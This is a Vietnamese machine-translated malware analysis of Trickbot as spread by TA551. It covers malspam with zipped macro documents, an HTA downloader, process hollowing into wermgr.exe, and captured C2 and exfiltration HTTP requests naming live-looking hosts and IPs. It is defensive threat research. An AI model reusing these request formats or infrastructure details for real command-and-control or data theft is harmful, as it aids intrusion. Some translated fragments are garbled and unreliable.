Phân tích phần mềm độc hại: Trickbot

Trickbot

Trong thời đại ngày nay, chúng ta không còn xử lý những loại vi rút được ghép lại với nhau một cách thô sơ, kiểu homebrew nữa. Phần mềm độc hại là một ngành công nghiệp và các nhà phát triển chuyên nghiệp được tìm thấy để trao đổi, có thể là bằng cách đánh cắp mã của một người hoặc sự cộng tác có chủ ý. Ngày nay, các cuộc tấn công có nhiều lớp, với các ứng dụng phần mềm phức tạp đa dạng đảm nhiệm các công việc khác nhau dọc theo chuỗi tấn công từ thỏa hiệp ban đầu đến mã hóa hoặc xâm nhập dữ liệu cuối cùng. Các công cụ cụ thể cho từng giai đoạn có tính chuyên môn hóa cao và thường có thể được thuê dưới dạng dịch vụ, bao gồm hỗ trợ khách hàng và các mô hình đăng ký để sử dụng chuyên nghiệp (ab). Rõ ràng, điều này đã làm tăng phần lớn tính khả dụng cũng như tính hiệu quả và tác động tiềm ẩn của phần mềm độc hại. Nghe có vẻ đáng sợ?

Vâng, nó có, nhưng sự chuyên nghiệp hóa rõ ràng thực sự cũng có một số mặt tốt. Một yếu tố là một số mô-đun được tái sử dụng thường thấy trong phần mềm độc hại có thể được sử dụng để xác định, theo dõi và phân tích phần mềm tấn công chuyên nghiệp. Cuối cùng, điều này có nghĩa là, với đủ kinh nghiệm, các nhà phân tích có kỹ năng có thể phát hiện và ngăn chặn phần mềm độc hại theo dõi của nó, thường với thiệt hại tối thiểu hoặc không có (nếu những kẻ tấn công vượt qua được tuyến phòng thủ đầu tiên).

Hãy xem thợ máy này hoạt động khi chúng ta theo dõi một nhà phân tích CyberSOC thực tế đang điều tra trường hợp của phần mềm độc hại có tên “”.

Nguồn gốc của Trickbot

Các CyberSOC của Orange Cyberdefense đã theo dõi phần mềm độc hại cụ thể có tên là Trickbot trong một thời gian khá dài. Nó thường được quy cho một Tác nhân Đe dọa cụ thể thường được biết đến dưới tên Nhện phù thủy (Crowdstrike), UNC1778 (FireEye) hoặc Gold Blackburn ().

Trickbot là một Trojan mô-đun phổ biến và ban đầu được sử dụng để nhắm mục tiêu vào ngành ngân hàng, trong khi đó nó cũng được sử dụng để xâm nhập các công ty từ các ngành khác. Nó cung cấp một số loại trọng tải. Trickbot phát triển dần dần để được sử dụng làm Phần mềm độc hại dưới dạng Dịch vụ (MaaS) bởi các nhóm tấn công khác nhau.

Tác nhân đe dọa đằng sau nó được biết là hành động nhanh chóng, sử dụng công cụ hậu khai thác nổi tiếng Cobalt Strike để di chuyển theo chiều ngang trên cơ sở hạ tầng mạng của công ty và triển khai ransomware như Ryuk hoặc Conti ở giai đoạn cuối. Vì nó được sử dụng để truy cập ban đầu, việc có thể phát hiện ra mối đe dọa này càng nhanh càng tốt là yếu tố thành công để ngăn chặn các cuộc tấn công tiếp theo.

Xem tiếp:   Băng đảng phần mềm độc hại TrickBot nâng cấp AnchorDNS Backdoor thành AnchorMail

Phân tích mối đe dọa này sẽ tập trung vào tác nhân đe dọa có tên TA551 và việc sử dụng Trickbot làm ví dụ. Tôi sẽ trình bày cách chúng tôi có thể thực hiện phát hiện ở các bước khác nhau của chuỗi tiêu diệt, bắt đầu từ lần lây nhiễm ban đầu thông qua các chiến dịch malspam, chuyển sang phát hiện các công cụ được sử dụng bởi tác nhân đe dọa trong quá trình thỏa hiệp. Chúng tôi cũng sẽ cung cấp một số thông tin bổ sung về cách tác nhân đe dọa sử dụng phần mềm độc hại này và quá trình tiến hóa mà nó đã diễn ra.

1 Quyền truy cập ban đầu

Kể từ tháng 6 năm 2021, nhóm TA551 bắt đầu phân phối phần mềm độc hại Trickbot bằng cách sử dụng zip được mã hóa. Cái cớ email bắt chước một thông tin quan trọng để làm giảm cảnh giác của người dùng.

Phần đính kèm bao gồm một tệp .zip một lần nữa bao gồm một tài liệu. Tệp zip luôn sử dụng tên giống như “request.zip” hoặc “info.zip” và cùng tên cho tệp tài liệu.

NB: The Threat Actor đã sử dụng cùng một phương thức hoạt động trước / song song với Trickbot để cung cấp phần mềm độc hại khác. Chúng tôi đã quan sát thấy trong cùng khoảng thời gian, từ tháng 6 năm 2021 đến tháng 9 năm 2021, việc sử dụng Bazarloader trên tải trọng truy cập ban đầu.

2 Chấp hành

Khi người dùng mở tài liệu với macro được bật, tệp HTA sẽ bị xóa trên hệ thống và khởi chạy bằng cmd.exe. Tệp HTA được sử dụng để tải xuống Trickbot DLL từ một máy chủ từ xa.

Hành vi này liên quan đến TA551, chúng tôi có thể xác định nó bằng mẫu “/ bdfh /” trong yêu cầu GET.

GET / bdfh / M8v[..]VUb HTTP / 1.1

Chấp nhận: */*

Máy chủ: wilkinstransportss.com

Content-Type: application / octet-stream

NB: Các mẫu liên quan đến TA551 phát triển theo thời gian, kể từ giữa tháng 8 năm 2021, mẫu đã thay đổi thành “/ bmdff /”. DLL được đăng ký dưới dạng tệp jpg để ẩn phần mở rộng thực và cố gắng chạy qua regsvr32.exe. Sau đó, Trickbot sẽ được đưa vào “wermgr.exe” bằng cách sử dụng kỹ thuật Process Hollowing.

Xem tiếp:   Meta mở rộng Chương trình Facebook Protect tới các Nhà hoạt động, Nhà báo, Quan chức Chính phủ

Hình 1 – Thực thi Trickbot trong
3 Bộ sưu tập

Sau khi thỏa hiệp hệ thống ban đầu thành công, Trickbot có thể thu thập nhiều thông tin về mục tiêu của nó bằng cách sử dụng các tệp thực thi hợp pháp của Windows và xác định xem hệ thống có phải là thành viên của miền Active Directory hay không.

Ngoài ra, trong bộ sưu tập này, Trickbot sẽ quét thêm thông tin như bản dựng Windows, địa chỉ IP công cộng, người dùng đang chạy Trickbot và cả hệ thống có sau tường lửa NAT hay không.

Trickbot cũng có thể thu thập thông tin nhạy cảm như dữ liệu ngân hàng hoặc thông tin đăng nhập và chuyển nó tới một máy chủ điều khiển và lệnh chuyên dụng (C2).

4 Lệnh & Điều khiển

Khi hệ thống bị nhiễm, nó có thể tiếp xúc với một số loại Trickbot C2. C2 chính là giao tiếp mà hệ thống nạn nhân sẽ giao tiếp, chủ yếu là để nhận các hướng dẫn mới.

Tất cả các yêu cầu đối với Trickbot C2 sử dụng định dạng sau:

“/ / / /

thông tin về lệnh> / “

NHẬN /zev4/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787/0/Windows 10 x64/1108 / XX.XX.XX.XX / 38245433F0E3D5689F6EE84483106F4382CC

6571D97A519A2EF29 / 0bqjxzSOQUSLPRJMQSWKDHTHKEG / HTTP / 1.1

Kết nối: Keep-Alive

Tác nhân người dùng: curl / 7.74.0

Máy chủ: 202.165.47.106

Tất cả dữ liệu thu thập được sẽ được gửi đến một Trickbot Exfiltration C2 riêng biệt bằng cách sử dụng các phương thức yêu cầu HTTP POST. Định dạng yêu cầu vẫn giữ nguyên, nhưng lệnh “90” dành riêng cho việc lọc dữ liệu, chính xác hơn là dữ liệu hệ thống được thu thập từ hệ thống bị nhiễm.

ĐĂNG /zev4/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787/90/ HTTP / 1.1

Kết nối: Keep-Alive

Nội dung-Loại: đa phần / biểu mẫu-dữ liệu; ranh giới = —— Ràng buộc

ary0F79C562

Tác nhân người dùng: Ghost

Máy chủ: 24.242.237.172:443

Các cuộc tấn công tiếp theo: Cobalt Strike, Ryuk, Conti

Cobalt Strike[1] là một công cụ truy cập từ xa thương mại, có đầy đủ tính năng, tự gọi nó là “phần mềm mô phỏng kẻ thù được thiết kế để thực hiện các cuộc tấn công có chủ đích và mô phỏng các hành động sau khai thác của các tác nhân đe dọa tiên tiến”. Khả năng tương tác sau khai thác của Cobalt Strike bao gồm đầy đủ các chiến thuật ATT & CK, tất cả đều được thực hiện trong một hệ thống tích hợp duy nhất.

Trong ngữ cảnh của chúng tôi, Trickbot sử dụng quy trình highjacked wermgr.exe để tải báo hiệu Cobalt Strike vào bộ nhớ.

Một số nhà khai thác ransomware cũng có liên quan đến các tác nhân đe dọa. Mục đích của Trickbot là thực hiện truy cập ban đầu trước cuộc tấn công ransomware thực sự. Conti và Ryuk là những ransomware chính được quan sát thấy ở giai đoạn cuối của các đợt lây nhiễm Trickbot, mặc dù cho đến nay không phải là những phần mềm duy nhất. Conti là một nhóm vận hành mô hình Ransomware-as-a-Service và có sẵn cho một số tác nhân đe dọa liên kết. Mặt khác, Ryuk là một ransomware được liên kết trực tiếp với tác nhân đe dọa đằng sau Trickbot.

Xem tiếp:   Băng đảng phần mềm độc hại khét tiếng TrickBot đóng cửa cơ sở hạ tầng Botnet của nó

Chìa khóa học tập

Các tác nhân đe dọa vẫn thường sử dụng các kỹ thuật cơ bản để xâm nhập vào mạng như email lừa đảo. Nâng cao nhận thức về lừa đảo chắc chắn là bước đầu tiên tuyệt vời trong việc xây dựng khả năng phục hồi trên không gian mạng. Các cuộc tấn công tốt nhất, sau tất cả, là những cuộc tấn công thậm chí không bao giờ bắt đầu.

Tất nhiên, không có thứ gọi là bảo vệ ngăn chặn chống đạn trong không gian mạng. Điều quan trọng hơn hết là có khả năng phát hiện Trickbot ở giai đoạn đầu. Mặc dù chuỗi tấn công có thể bị phá vỡ ở mọi giai đoạn: càng về sau, nguy cơ thỏa hiệp hoàn toàn và dẫn đến thiệt hại càng cao. Trickbot được sử dụng bởi các tác nhân đe dọa khác nhau, nhưng phương pháp phát hiện vẫn giống nhau trên hầu hết các giai đoạn cụ thể của nó. Một số chỉ số của sự thỏa hiệp được giải thích ở đây. Nhưng phần mềm độc hại cũng nhận được các bản cập nhật.

Các nhà phân tích phải cảnh giác. Theo dõi và theo dõi một phần mềm độc hại cụ thể hoặc một tác nhân gây ra mối đe dọa là chìa khóa để theo dõi sự phát triển, cải tiến của nó và luôn cập nhật về cách phát hiện mối đe dọa hiệu quả.

Đây là một câu chuyện từ các chiến hào được tìm thấy trong Security Navigator. Bạn cũng có thể tìm thấy nhiều phân tích phần mềm độc hại và các nội dung thú vị khác bao gồm tài khoản về các hoạt động ứng phó khẩn cấp và quan điểm của nhà khoa học tội phạm về mã độc tống tiền mạng, cũng như hàng tấn dữ kiện và số liệu về bối cảnh an ninh nói chung. Báo cáo đầy đủ có sẵn để tải xuống trên trang web Orange Cyberdefense, vì vậy hãy xem. Nó có giá trị nó!

[1] MITER ATT & CK Cobaltstrike: https://attack.mitre.org/software/S0154/

Bài báo này được viết bởi Florian GoutinNhà phân tích CyberSOC tại Orange Cyberdefense.

.

Related Posts

Check Also

Trình tạo ‘lượng tử’ mới cho phép những kẻ tấn công dễ dàng tạo các phím tắt độc hại cho Windows

Một công cụ phần mềm độc hại mới cho phép các tác nhân tội phạm …